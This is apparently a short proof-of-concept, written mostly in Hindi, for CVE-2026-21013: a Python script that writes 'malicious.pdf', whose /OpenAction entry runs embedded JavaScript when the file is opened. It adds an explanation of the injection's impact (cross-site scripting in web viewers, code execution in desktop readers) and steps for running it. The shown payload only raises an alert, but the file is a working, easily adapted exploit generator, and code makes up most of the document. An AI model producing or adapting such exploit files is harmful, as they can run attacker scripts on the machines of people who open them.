
एक PDF उत्पन्न करता है जिसमें एम्बेडेड JavaScript होता है, जो CVE-2026-21013 का प्रदर्शन करता है — एक OpenAction इंजेक्शन जो असुरक्षित PDF रीडरों में स्क्रिप्ट निष्पादन की ओर ले जाता है।
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
एक PDF जनरेटर PDF फ़ाइल में एम्बेड करने से पहले उपयोगकर्ता द्वारा आपूर्ति की गई सामग्री को सैनिटाइज़ नहीं करता है। एक हमलावर /OpenAction JavaScript प्रविष्टि इंजेक्ट कर सकता है जो दस्तावेज़ खोलने पर निष्पादित होती है, जिससे वेब व्यूअर में क्रॉस-साइट स्क्रिप्टिंग या पूर्ण JS समर्थन वाले डेस्कटॉप रीडर में स्थानीय कोड निष्पादन हो सकता है।
जनरेटर चलाएँ:
python generate_pdf_js_inject.py
परिणामी malicious.pdf को ऐसे PDF रीडर में खोलें जो JavaScript का समर्थन करता है; एक अलर्ट बॉक्स दिखाई देगा।